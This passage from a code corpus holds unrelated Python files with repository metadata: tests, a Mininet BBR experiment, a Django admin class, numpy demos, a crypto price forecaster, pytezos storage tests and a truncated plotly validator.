def test_trailing_zeros():
    # Zeros below the lowest set bit; an all-zero mask yields the full 8.
    assert _trailing_zeros(0b1) == 0
    assert _trailing_zeros(0b10) == 1
    assert _trailing_zeros(0b100) == 2
    assert _trailing_zeros(0b00000000) == 8  # Mask is all zeros
def test_int_to_bytes():
    # Big-endian by default; non-int input must raise TypeError.
    assert _int_to_bytes(512, 2) == b'\x02\x00'
    assert _int_to_bytes(512, 2, endianness='little') == b'\x00\x02'
    with pytest.raises(TypeError):
        _int_to_bytes('', 2)
| [
"phil@gadgetoid.com"
] | phil@gadgetoid.com |
64121605ca20b778ed7290a0e87d052fbb42dfd3 | 0cff676ec482e23ee4d9867659f553aa3b7c7a3d | /bin/alert-cloudwatch | 7873c24de514052ecc7a0799763db3b407e84069 | [
"Apache-2.0"
] | permissive | jaxxstorm/alerta | 46db7e510ca3cc430e0235a526752615ad2bed18 | af33dc951305134792f03b3ea0d8e49c32d69918 | refs/heads/master | 2020-12-25T03:20:19.934180 | 2014-06-21T20:58:44 | 2014-06-21T20:58:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | #!/usr/bin/env python
########################################
#
# alert-cloudwatch - Alert AWS CloudWatch
#
########################################
import os
import sys
# Allow running straight from a source checkout: if the directory two levels
# above this script contains alerta/__init__.py, prefer it over any
# installed copy by prepending it to sys.path.
possible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),
                                                os.pardir,
                                                os.pardir))
if os.path.exists(os.path.join(possible_topdir, 'alerta', '__init__.py')):
    sys.path.insert(0, possible_topdir)
from alerta.common import config
from alerta.common import log as logging
from alerta.cloudwatch.daemon import CloudWatchDaemon, __version__
LOG = logging.getLogger('alerta.cloudwatch')
CONF = config.CONF
if __name__ == '__main__':
    # Parse CLI/config options, initialise logging, then run the daemon
    # in the foreground (start() blocks).
    config.parse_args(version=__version__)
    logging.setup('alerta')
    cloudwatch = CloudWatchDaemon('alert-cloudwatch')
    cloudwatch.start()
| [
"nick.satterly@guardian.co.uk"
] | nick.satterly@guardian.co.uk | |
53435264f240904694179d2c3e32b6a930f22b9d | a88db875957d20f349d80cff48572ceb60881840 | /bbr.py | dd6f495db12ecc8bd708c5fb2a0113a96f783803 | [] | no_license | mfkiwl/when-to-use-bbr | 5f7d0f31768f93f2dc5448b8b9505860fcb1c4e2 | a5eb4919d2193cbb750ee982df9f9c449afdf16c | refs/heads/master | 2023-04-29T00:25:18.413169 | 2021-05-08T20:22:54 | 2021-05-08T20:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,084 | py | import argparse
import mininet.topo
import mininet.net
import mininet.node
import mininet.link
import mininet.net
import mininet.util
import mininet.clean
from remote import RemoteHost, RemoteSSHLink, RemoteOVSSwitch
class Topology(mininet.topo.Topo):
    """Dumbbell topology for the BBR experiments: h1, h2 -> s1 -> h3.

    h3 may be placed on a remote machine (config.remote_host); the s1-h3
    link carries the configured RTT while the host-side links carry only
    a minimal delay.
    """
    def __init__(self, config):
        # argparse namespace with bw/rtt/remote_* settings
        self.config = config
        # in Section 3.1, the paper mentioned that the delay between h1/h2 and h3 is 40us
        # (halved here — presumably so the round trip totals ~40us; confirm)
        self._min_delay = "{0}us".format(40 / 2)
        super(Topology, self).__init__()
    def build(self):
        h1 = self.addHost("h1")
        h2 = self.addHost("h2")
        # h3 lives on the (possibly remote) receiver machine
        h3 = self.addHost("h3", server=self.config.remote_host, user=self.config.remote_user,
                          port=self.config.remote_host_port)
        s1 = self.addSwitch("s1")
        # add link
        self.addLink(h1, s1, bw=self.config.bw, delay=self._min_delay)
        self.addLink(h2, s1, bw=self.config.bw, delay=self._min_delay)
        # bottleneck link: half the target RTT per direction of s1<->h3
        self.addLink(s1, h3, bw=self.config.bw, delay="{0}ms".format(self.config.rtt / 2))
def run(configs):
    """Build the topology and bring up the Mininet network.

    Uses the remote-capable host/link/switch classes when h3 is not local.
    NOTE(review): only pings in --debug mode; the BBR/cubic traffic
    generation itself is not implemented here.
    """
    # clean up previous mininet runs in case of crashes
    mininet.clean.cleanup()
    topology = Topology(configs)
    if configs.remote_host != "localhost":
        net = mininet.net.Mininet(topology, host=RemoteHost, link=RemoteSSHLink, switch=RemoteOVSSwitch,
                                  waitConnected=True)
    else:
        net = mininet.net.Mininet(topology, host=mininet.node.CPULimitedHost, link=mininet.link.TCLink)
    net.start()
    if configs.debug:
        # test out the component
        mininet.util.dumpNetConnections(net)
        net.pingAll()
    # clean up at the end
    mininet.clean.cleanup()
def main():
    """Parse the experiment parameters from the CLI and run the experiment.

    Choices mirror the parameter sweep of the BBR evaluation: congestion
    control algorithm, bottleneck RTT (ms), bandwidth (Mbps), switch buffer
    size, and optional remote-host placement for h3.
    """
    parser = argparse.ArgumentParser("BBR experiments")
    parser.add_argument("-c", "--congestion-control", choices=["bbr", "cubic"], default="bbr",
                        help="h1 and h2 congestion control algorithm type", type=str, dest="cc")
    parser.add_argument("--rtt", choices=[5, 10, 25, 50, 75, 100, 150, 200], default=5,
                        help="RTT for the bottle net link", type=int, dest="rtt")
    parser.add_argument("--bw", choices=[10, 20, 50, 100, 250, 500, 1000], default=10,
                        help="Bandwidth for the bottleneck link", type=int, dest="bw")
    parser.add_argument("-s", "--size", "--buffer-size", choices=[0.1, 1, 10, 20, 50], default=0.1,
                        help="Switch buffer size", type=float, dest="size")
    parser.add_argument("--remote-host", default="localhost", type=str, dest="remote_host",
                        help="remote host name/IP address")
    parser.add_argument("--remote-host-port", default=22, type=int, dest="remote_host_port",
                        help="remote host port number to ssh in")
    parser.add_argument("--remote-user", default="", type=str, dest="remote_user",
                        help="remote host user name")
    parser.add_argument("--debug", action="store_true", dest="debug")
    args = parser.parse_args()
    # run the experiments
    run(args)
if __name__ == "__main__":
    main()
| [
"keyi@stanford.edu"
] | keyi@stanford.edu |
d07b6032abc8c0e3f237db652599fa785edfa2dc | 488c20476d5528c7e942e09f4c88422f67b86853 | /pages/admin.py | c117c10318328e8ee13a42ba8672a5148b952413 | [] | no_license | DaniTodorowa/DjangoToHeroku | e8b600cd07a5864905d6a34f08edcc31a69e4e1b | 2df26ecc429cdca0643c174d81ff77ca5930e145 | refs/heads/master | 2023-02-05T17:17:32.756299 | 2020-12-21T19:10:22 | 2020-12-21T19:10:22 | 319,601,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | from django.contrib import admin
from pages.models import Team
from django.utils.html import format_html
class TeamAdmin(admin.ModelAdmin):
    """Admin changelist for Team with an inline round photo thumbnail."""

    def thumbnail(self, obj):
        """Render the member's photo as a small round <img> tag.

        The URL is passed as a format_html() argument rather than being
        pre-interpolated with str.format(): pre-formatting injects the raw
        value into markup that format_html() then marks safe, bypassing
        escaping entirely.
        """
        return format_html('<img src="{}" width="40" style="border-radius:50px;" />', obj.photo.url)
    thumbnail.short_description = 'Photo'

    # Columns on the changelist page; 'thumbnail' resolves to the method above.
    list_display = ('id', 'thumbnail', 'first_name', 'designation', 'created_date')
    list_display_links = ('id', 'thumbnail', 'first_name')
    search_fields = ('first_name', 'last_name', 'designation')
    list_filter = ('designation',)
admin.site.register(Team, TeamAdmin)
| [
"danitodorova2106@gmail.com"
] | danitodorova2106@gmail.com |
86cab9c16847bab1698333842dec26244522d89a | f1d3aabacc69d1622e6005100e9d2f139b08e4f3 | /chapter_5/ch5-40.naming.py | a12c706f6277c5ce300306fa60ba5acec216f12d | [] | no_license | tschoi6712/HelloCodingPython | 2d49369df97c2eb3b87823ab084674f49e653043 | 0701dcb4715c4e15d049843e82042f92a5784a97 | refs/heads/master | 2020-07-27T08:16:43.291222 | 2019-09-17T10:44:52 | 2019-09-17T10:44:52 | 209,026,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 618 | py | """""""""""""""""""""""""""
코드에 이름 붙이기
"""""""""""""""""""""""""""
# Version 1: behaviour explained only through comments
number_input = input("숫자 입력> ")
radius = float(number_input)
print(2 * 3.14 * radius) # circumference of the circle
print(3.14 * radius * radius) # area of the circle
# Version 2: the same logic, with names (functions/constants) replacing comments
# NOTE: the function below intentionally shadows the variable of the same name.
PI = 3.14
def number_input():
    """Prompt the user for a number and return it as a float."""
    output = input("숫자 입력> ")
    return float(output)
def get_circumference(radius):
    """Return the circumference of a circle with the given radius."""
    return 2 * PI * radius
def get_circle_area(radius):
    """Return the area of a circle with the given radius."""
    return PI * radius * radius
radius = number_input()
print(get_circumference(radius))
print(get_circle_area(radius))
| [
"tschoi6712@gmail.com"
] | tschoi6712@gmail.com |
9b2b8d9a504e1ddc561e1f9a302d6c4958662e9b | 0b751bab8d276d976e18b174e12fb26299b0a0fa | /cmake-build-debug/catkin_generated/generate_cached_setup.py | b0895402ca4143a9357dbcd96b673750652bc7f4 | [] | no_license | sukai33/stereo_camera | 9e8fd7c7175c863f65b87c02ef3dd50ea44f5bc3 | 5d2969c51e73c5b5c0a5b4e1fd4ea39aae54d788 | refs/heads/master | 2022-12-31T14:39:38.244507 | 2020-10-24T14:38:07 | 2020-10-24T14:38:07 | 306,902,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
# Auto-generated by catkin; locates the catkin python package and renders a
# cached environment setup script for this workspace.
# Prefer the catkin sources shipped with the system ROS installation.
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
    sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
    from catkin.environment_cache import generate_environment_script
except ImportError:
    # search for catkin package in all workspaces and prepend to path
    for workspace in '/home/ty/Workspace/ROS/study_ws/devel;/opt/ros/melodic'.split(';'):
        python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
        if os.path.isdir(os.path.join(python_path, 'catkin')):
            sys.path.insert(0, python_path)
            break
    from catkin.environment_cache import generate_environment_script
# Render the cached environment lines and write them as a shell script.
code = generate_environment_script('/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/devel/env.sh')
output_filename = '/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
    # print('Generate script for cached setup "%s"' % output_filename)
    f.write('\n'.join(code))
# Mark the generated script user-executable.
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"422168787@qq.com"
] | 422168787@qq.com |
6ced28b132958d66dd3e4dfcf2043949abc92e14 | 84f3814b595dd362188d8c3b8ba54f80031655a0 | /tangyudi/base/numpy/numpy_4.py | 25a2b556c6fc21f7b56e50277d00d9a482cdd965 | [] | no_license | qisionline/py_stu | 56f1698aad1bc104e260e7d54f55b84aee193813 | 5bafb6296a1f583df2b43defc3061f7093079ab6 | refs/heads/master | 2023-06-20T00:06:22.793170 | 2021-07-05T07:06:24 | 2021-07-05T07:06:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py |
import numpy as np
a=np.arange(12)
# Plain assignment creates an alias: b and a are the same array object.
b=a
print(b is a)
b.shape=3,4
print(a.shape)  # reshaping through the alias reshapes a as well
print(a)
print(b)
print(id(a))
print(id(b))
# view(): a new array object that shares the same underlying data buffer.
c=a.view()
print(c)
a.shape=2,6
print(a)  # reshaping a does NOT reshape the view c (shapes are per-object)
a[0,4]=55
print(a)
print(c)  # ...but element writes through a ARE visible in c (shared data)
print(c is a)
# copy(): a fully independent array with its own data.
d=a.copy()
print(d is a)
d[0,0]=9999
print(d)
print(a)  # a is unchanged: the copy shares nothing with it
| [
"1850094299@qq.com"
] | 1850094299@qq.com |
4ce8f9853c6437d81e11aaaef635f53fd238a39b | e4713c248c857b06a3cb0e9d0d15dd5513b1a8e9 | /phonenumbers/shortdata/region_RS.py | 4348b933951308ad6b2bb7bba8514682199003a3 | [
"MIT",
"Apache-2.0"
] | permissive | igushev/fase_lib | 8f081e0f6b956b186dc759906b21dc3fc449f045 | 182c626193193b196041b18b9974b5b2cbf15c67 | refs/heads/master | 2023-05-14T14:35:05.727202 | 2022-04-15T23:55:37 | 2022-04-15T23:55:37 | 107,228,694 | 10 | 0 | MIT | 2023-05-01T19:38:09 | 2017-10-17T06:47:07 | Python | UTF-8 | Python | false | false | 710 | py | """Auto-generated file, do not edit by hand. RS metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
# Generated short-number metadata for Serbia (RS): emergency numbers 112 and
# 92-94, plus 11x/18x-prefixed short codes of 2-6 digits overall.
PHONE_METADATA_RS = PhoneMetadata(id='RS', country_code=None, international_prefix=None,
    general_desc=PhoneNumberDesc(national_number_pattern='[19]\\d{1,5}', possible_number_pattern='\\d{2,6}', possible_length=(2, 3, 4, 5, 6)),
    emergency=PhoneNumberDesc(national_number_pattern='112|9[234]', possible_number_pattern='\\d{2,3}', example_number='112', possible_length=(2, 3)),
    short_code=PhoneNumberDesc(national_number_pattern='1[189]\\d{1,4}|9[234]', possible_number_pattern='\\d{2,6}', example_number='112', possible_length=(2, 3, 4, 5, 6)),
    short_data=True)
| [
"igushev@gmail.com"
] | igushev@gmail.com |
3e94df54d8c79bf66cff5bd9738907713285a1fb | 4b44a299bafbd4ca408ce1c89c9fe4a449632783 | /python3/06_Collections/02_Tuples/07_named_tuple_ops.py | 7ab2152e8002aeee3c28dc99e29bece4712233ce | [] | no_license | umunusb1/PythonMaterial | ecd33d32b2de664eaaae5192be7c3f6d6bef1d67 | 1e0785c55ccb8f5b9df1978e1773365a29479ce0 | refs/heads/master | 2023-01-23T23:39:35.797800 | 2020-12-02T19:29:00 | 2020-12-02T19:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | #!/usr/bin/python
"""
Purpose: Named Tuple ops
"""
from collections import namedtuple
Animal = namedtuple('Animal', 'name age type')
# Positional assignment: values map to fields by position.
hen = Animal('hen', '2', 'bird')
#             0      1     2
print(hen)
hen = Animal(name='hen', age='2', type='bird')
print(hen)
hen = Animal(age='2', name='hen', type='bird')
print(hen)
# NOTE: with keyword arguments the field order does not matter.
# _fields lists the field names of the namedtuple class.
print(f'{hen._fields =}')
# Accessing values
print()
print('Access By position:', hen[2])
print('Access By key name:', hen.type)
# _asdict() converts the record into a dict keyed by field name.
print(f'{hen._asdict() =}')
"uday3prakash@gmail.com"
] | uday3prakash@gmail.com |
0de9739f74e58c61be4f017af3e9f07f596a8e84 | 1a3228de688754e6c58f248eecfbfdd77c60e72f | /docs/test_asyncio.py | bc288e45631d8804ad67aab78bf222f8558c1f31 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ArtemSerga/hiku | c38d8b4a4fe7ed780680dbe7969652233306a1a3 | 90e7cc50e2754d5dfdc06a6c2f5c6cc55e634566 | refs/heads/master | 2021-01-23T12:46:45.568208 | 2017-06-03T16:40:01 | 2017-06-03T16:40:01 | 93,199,117 | 0 | 0 | null | 2017-06-02T19:52:02 | 2017-06-02T19:52:02 | null | UTF-8 | Python | false | false | 7,346 | py | import uuid
import pytest
import asyncio
# setup storage
from sqlalchemy import MetaData, Table, Column
from sqlalchemy import Integer, String, ForeignKey, select
from sqlalchemy.sql.ddl import CreateTable
# Schema: characters and the actors who portrayed them (many actors per
# character via actor.character_id).
metadata = MetaData()
character_table = Table(
    'character',
    metadata,
    Column('id', Integer, primary_key=True),
    Column('name', String),
    Column('species', String),
)
actor_table = Table(
    'actor',
    metadata,
    Column('id', Integer, primary_key=True),
    Column('name', String),
    Column('character_id', ForeignKey('character.id'), nullable=False),
)
# setup test environment
import aiopg.sa
async def init_db(pg_dsn, *, loop):
    """Create a uniquely named scratch database and return its name."""
    db_name = 'test_{}'.format(uuid.uuid4().hex)
    async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
        async with db_engine.acquire() as conn:
            await conn.execute('CREATE DATABASE {0}'.format(db_name))
    return db_name
async def setup_db(db_dsn, *, loop):
    """Create both tables in the scratch database and load fixture rows."""
    async with aiopg.sa.create_engine(db_dsn, loop=loop) as db_engine:
        async with db_engine.acquire() as conn:
            await conn.execute(CreateTable(character_table))
            await conn.execute(CreateTable(actor_table))
            await conn.execute(character_table.insert().values([
                dict(id=1, name='James T. Kirk', species='Human'),
                dict(id=2, name='Spock', species='Vulcan/Human'),
                dict(id=3, name='Leonard McCoy', species='Human'),
            ]))
            # Two actors per character: original series and reboot casts.
            await conn.execute(actor_table.insert().values([
                dict(id=1, character_id=1, name='William Shatner'),
                dict(id=2, character_id=2, name='Leonard Nimoy'),
                dict(id=3, character_id=3, name='DeForest Kelley'),
                dict(id=4, character_id=1, name='Chris Pine'),
                dict(id=5, character_id=2, name='Zachary Quinto'),
                dict(id=6, character_id=3, name='Karl Urban'),
            ]))
async def drop_db(pg_dsn, db_name, *, loop):
    """Drop the scratch database created by init_db."""
    async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
        async with db_engine.acquire() as conn:
            await conn.execute('DROP DATABASE {0}'.format(db_name))
@pytest.fixture(scope='session', name='db_dsn')
def db_dsn_fixture(request):
    """Session fixture: provision a populated scratch DB, yield its DSN."""
    loop = asyncio.get_event_loop()
    pg_dsn = 'postgresql://postgres:postgres@postgres:5432/postgres'
    db_name = loop.run_until_complete(init_db(pg_dsn, loop=loop))
    db_dsn = 'postgresql://postgres:postgres@postgres:5432/{}'.format(db_name)
    loop.run_until_complete(setup_db(db_dsn, loop=loop))
    def fin():
        # Drop the scratch database when the test session finishes.
        loop.run_until_complete(drop_db(pg_dsn, db_name, loop=loop))
    request.addfinalizer(fin)
    return db_dsn
# define graph
from hiku.graph import Graph, Root, Node, Link
from hiku.types import TypeRef, Sequence
from hiku.engine import pass_context
from hiku.sources import aiopg as sa
# Context key under which the aiopg engine is passed to the hiku engine.
SA_ENGINE_KEY = 'sa-engine'
# Field-level queries: resolve scalar columns of each table.
character_query = sa.FieldsQuery(SA_ENGINE_KEY, character_table)
actor_query = sa.FieldsQuery(SA_ENGINE_KEY, actor_table)
# One-to-many link: character.id -> actor ids via actor.character_id.
character_to_actors_query = sa.LinkQuery(Sequence[TypeRef['actor']], SA_ENGINE_KEY,
                                         from_column=actor_table.c.character_id,
                                         to_column=actor_table.c.id)
async def direct_link(ids):
    # The requirement values (actor.character_id) already ARE the target
    # node ids, so this link resolver returns them unchanged.
    return ids
@pass_context
async def to_characters_query(ctx):
    """Root link resolver: return the ids of all character rows."""
    query = select([character_table.c.id])
    async with ctx[SA_ENGINE_KEY].acquire() as conn:
        rows = await conn.execute(query)
        return [row.id for row in rows]
@pass_context
async def to_actors_query(ctx):
    """Root link resolver: return the ids of all actor rows."""
    query = select([actor_table.c.id])
    async with ctx[SA_ENGINE_KEY].acquire() as conn:
        rows = await conn.execute(query)
        return [row.id for row in rows]
# Graph definition: two nodes backed by the SQL queries above, linked in
# both directions, plus root links exposing all characters and all actors.
GRAPH = Graph([
    Node('character', [
        sa.Field('id', character_query),
        sa.Field('name', character_query),
        sa.Field('species', character_query),
        sa.Link('actors', character_to_actors_query, requires='id'),
    ]),
    Node('actor', [
        sa.Field('id', actor_query),
        sa.Field('name', actor_query),
        sa.Field('character_id', actor_query),
        # character_id doubles as the target id, hence the identity resolver.
        Link('character', TypeRef['character'],
             direct_link, requires='character_id'),
    ]),
    Root([
        Link('characters', Sequence[TypeRef['character']],
             to_characters_query, requires=None),
        Link('actors', Sequence[TypeRef['actor']],
             to_actors_query, requires=None),
    ]),
])
# test graph
import aiopg.sa
from hiku.engine import Engine
from hiku.result import denormalize
from hiku.readers.simple import read
from hiku.executors.asyncio import AsyncIOExecutor
async def execute(hiku_engine, sa_engine, graph, query_string):
    """Run a simple-syntax query against *graph* and return plain dicts."""
    query = read(query_string)
    result = await hiku_engine.execute(graph, query, {SA_ENGINE_KEY: sa_engine})
    return denormalize(graph, result, query)
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_character_to_actors(db_dsn, event_loop):
    """Follow the one-to-many character -> actors link for every character."""
    hiku_engine = Engine(AsyncIOExecutor(event_loop))
    async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
        result = await execute(hiku_engine, sa_engine, GRAPH,
                               '[{:characters [:name {:actors [:name]}]}]')
        # Each character must list both the original-series and reboot actor.
        assert result == {
            'characters': [
                {
                    'name': 'James T. Kirk',
                    'actors': [
                        {'name': 'William Shatner'},
                        {'name': 'Chris Pine'},
                    ],
                },
                {
                    'name': 'Spock',
                    'actors': [
                        {'name': 'Leonard Nimoy'},
                        {'name': 'Zachary Quinto'},
                    ],
                },
                {
                    'name': 'Leonard McCoy',
                    'actors': [
                        {'name': 'DeForest Kelley'},
                        {'name': 'Karl Urban'},
                    ],
                },
            ],
        }
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_actor_to_character(db_dsn, event_loop):
    """Follow the many-to-one actor -> character link for every actor."""
    hiku_engine = Engine(AsyncIOExecutor(event_loop))
    async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
        result = await execute(hiku_engine, sa_engine, GRAPH,
                               '[{:actors [:name {:character [:name]}]}]')
        # Each actor resolves back to the single character they portray.
        assert result == {
            'actors': [
                {
                    'name': 'William Shatner',
                    'character': {'name': 'James T. Kirk'},
                },
                {
                    'name': 'Leonard Nimoy',
                    'character': {'name': 'Spock'},
                },
                {
                    'name': 'DeForest Kelley',
                    'character': {'name': 'Leonard McCoy'},
                },
                {
                    'name': 'Chris Pine',
                    'character': {'name': 'James T. Kirk'},
                },
                {
                    'name': 'Zachary Quinto',
                    'character': {'name': 'Spock'},
                },
                {
                    'name': 'Karl Urban',
                    'character': {'name': 'Leonard McCoy'},
                },
            ],
        }
"vladimir@magamedov.com"
] | vladimir@magamedov.com |
e72c7937c256545ad06b5ab6bfadcaaa59a4f708 | ab4de1c8caf95571be1e29e2c44272080cbf79be | /2018-07-10/diamantes.py | 6d95056c2bf5fb62708f3684e794901c397e63a5 | [] | no_license | grupydf/dojos | f1c3cf7ad941b93efe875500e1bd18c914cfd372 | ea79079a71dfb43b858acebc028de7f61b0e4177 | refs/heads/master | 2021-01-18T16:29:57.786827 | 2020-05-10T19:57:17 | 2020-05-10T19:57:17 | 20,621,041 | 5 | 6 | null | 2020-05-10T19:57:19 | 2014-06-08T16:38:55 | Python | UTF-8 | Python | false | false | 862 | py | """
diamante('c')
a
b b
c c
b b
a
"""
# Module-level state. Only `alfabeto` is used by the current
# implementation of `sequencia`; the remaining names are unused
# leftovers from an earlier attempt.
listaTemp = []
abcedario = ['a', 'b', 'c', 'd', ]
alfabeto = 'abcdefghijklmnopqrstuvwxyz'
j = 0
lista2 = []
k = 0
def sequencia(letra):
    """Return the diamond letter sequence up to *letra* and back.

    e.g. sequencia('c') -> ['a', 'b', 'c', 'b', 'a'].

    :param letra: a lowercase ASCII letter marking the widest row.
    :raises ValueError: if *letra* does not occur in the alphabet
        (the previous `str.find` version silently returned -1 and
        produced a nonsense 51-element sequence instead).
    """
    # Use the stdlib constant rather than the module-level `alfabeto`
    # global so the function is self-contained.
    from string import ascii_lowercase
    # str.index raises ValueError for characters outside the alphabet.
    stop = ascii_lowercase.index(letra)
    rising = list(ascii_lowercase[:stop])
    return rising + [letra] + rising[::-1]
def test_sequence_a():
    """The first letter yields a one-element sequence."""
    assert sequencia('a') == ['a']
def test_sequence_b():
    """The sequence rises to 'b' and mirrors back down."""
    assert sequencia('b') == ['a', 'b', 'a']
def test_sequence_c():
    """The sequence rises to 'c' and mirrors back down."""
    assert sequencia('c') == ['a', 'b', 'c', 'b', 'a']
| [
"humrochagf@gmail.com"
] | humrochagf@gmail.com |
17111326eafe9c7e22bb9fbee83b1687511d8bd6 | d55937a3fe1490c43f509267081a6ef0122131d1 | /predictions.py | fbf2ca8d7907dffa70c5a48c492187da315e655b | [] | no_license | kennethreitz/coinbin.org | e45abb9a00ae968365f057d7b0f44451d3ef52c7 | bc3232fe5157363240a394a564d96f0500605e38 | refs/heads/master | 2022-05-26T01:02:16.111756 | 2018-01-12T22:20:19 | 2018-01-12T22:20:19 | 101,120,306 | 276 | 40 | null | 2018-01-12T22:20:20 | 2017-08-23T00:43:00 | Python | UTF-8 | Python | false | false | 2,131 | py | import time
import uuid
import records
import os
import maya
import numpy as np
import pandas as pd
# Matplotlib hack.
import matplotlib
matplotlib.use('agg')
import mpld3
from fbprophet import Prophet
from scraper import Coin, MWT, convert_to_decimal
PERIODS = 30          # days of forecast returned by the API
GRAPH_PERIODS = 365   # days of forecast shown in the rendered graph
@MWT(timeout=300)
def get_predictions(coin, render=False):
    """Return a 30-day forecast for *coin* as a list of dicts, unless
    render is True; then return the forecast plot as an mpld3 HTML
    fragment (note: HTML markup, not an image path).

    Results are memoized for 300 seconds via the MWT decorator.
    """
    c = Coin(coin)
    q = "SELECT date as ds, value as y from api_coin WHERE name=:coin"
    db = records.Database()
    rows = db.query(q, coin=c.name)
    df = rows.export('df')
    df['y_orig'] = df['y'] # to save a copy of the original data..you'll see why shortly.
    # log-transform y: Prophet is fit on log-prices, predictions are
    # exponentiated back below.
    df['y'] = np.log(df['y'])
    model = Prophet(weekly_seasonality=True, yearly_seasonality=True)
    model.fit(df)
    periods = PERIODS if not render else GRAPH_PERIODS
    future_data = model.make_future_dataframe(periods=periods, freq='d')
    forecast_data = model.predict(future_data)
    if render:
        matplotlib.pyplot.gcf()
        fig = model.plot(forecast_data, xlabel='Date', ylabel='log($)')
        return mpld3.fig_to_html(fig)
    forecast_data_orig = forecast_data # make sure we save the original forecast data
    # Undo the log transform on the prediction and its bounds.
    forecast_data_orig['yhat'] = np.exp(forecast_data_orig['yhat'])
    forecast_data_orig['yhat_lower'] = np.exp(forecast_data_orig['yhat_lower'])
    forecast_data_orig['yhat_upper'] = np.exp(forecast_data_orig['yhat_upper'])
    df['y_log'] = df['y'] #copy the log-transformed data to another column
    df['y'] = df['y_orig'] #copy the original data to 'y'
    # print(forecast_data_orig)
    d = forecast_data_orig['yhat'].to_dict()
    predictions = []
    # Only the last PERIODS entries of the forecast are future dates;
    # pair each with a human-friendly relative timestamp.
    for i, k in enumerate(list(d.keys())[-PERIODS:]):
        w = maya.when(f'{i+1} days from now')
        predictions.append({
            'when': w.slang_time(),
            'timestamp': w.iso8601(),
            'usd': convert_to_decimal(d[k]),
        })
    return predictions
if __name__ == '__main__':
    # Ad-hoc smoke test: print the 30-day forecast for bitcoin.
    print(get_predictions('btc'))
| [
"me@kennethreitz.org"
] | me@kennethreitz.org |
9d0105951ac244b0c59503e22b216fcdfab8e881 | 90c6262664d013d47e9a3a9194aa7a366d1cabc4 | /tests/storage/cases/test_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.py | d79748b5bc4a12c3f19b31fdefaf91282de497fa | [
"MIT"
] | permissive | tqtezos/pytezos | 3942fdab7aa7851e9ea81350fa360180229ec082 | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | refs/heads/master | 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 | MIT | 2020-12-30T16:44:56 | 2019-12-12T17:47:53 | Python | UTF-8 | Python | false | false | 1,130 | py | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(TestCase):
    """Storage round-trip / schema / formatting checks for the recorded
    contract KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA (zeronet fixture).
    """
    @classmethod
    def setUpClass(cls):
        # Load the contract fixture once for all tests in this class.
        cls.maxDiff = None
        cls.contract = get_data('storage/zeronet/KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.json')
    def test_storage_encoding_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
        """Decoding the storage and re-encoding it must reproduce the
        original Micheline expression exactly."""
        type_expr = self.contract['script']['code'][1]
        val_expr = self.contract['script']['storage']
        schema = build_schema(type_expr)
        decoded = decode_micheline(val_expr, type_expr, schema)
        actual = encode_micheline(decoded, schema)
        self.assertEqual(val_expr, actual)
    def test_storage_schema_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
        """Building a schema from script section [0] must not raise."""
        _ = build_schema(self.contract['script']['code'][0])
    def test_storage_format_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
        """Micheline -> Michelson pretty-printing must not raise."""
        _ = micheline_to_michelson(self.contract['script']['code'])
        _ = micheline_to_michelson(self.contract['script']['storage'])
| [
"mz@baking-bad.org"
] | mz@baking-bad.org |
d398d48c8080f72fa8318e8bace03ec75d59c088 | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/splom/marker/colorbar/_ticklabelstep.py | 60e50e822cdfe58fb01e5adc7eecda99cb369c3c | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 487 | py | import _plotly_utils.basevalidators
class TicklabelstepValidator(_plotly_utils.basevalidators.IntegerValidator):
    """Validator for the `ticklabelstep` property of
    `splom.marker.colorbar`: an integer with minimum 1, edited under the
    "colorbars" edit type unless overridden via kwargs.
    """
    def __init__(
        self, plotly_name="ticklabelstep", parent_name="splom.marker.colorbar", **kwargs
    ):
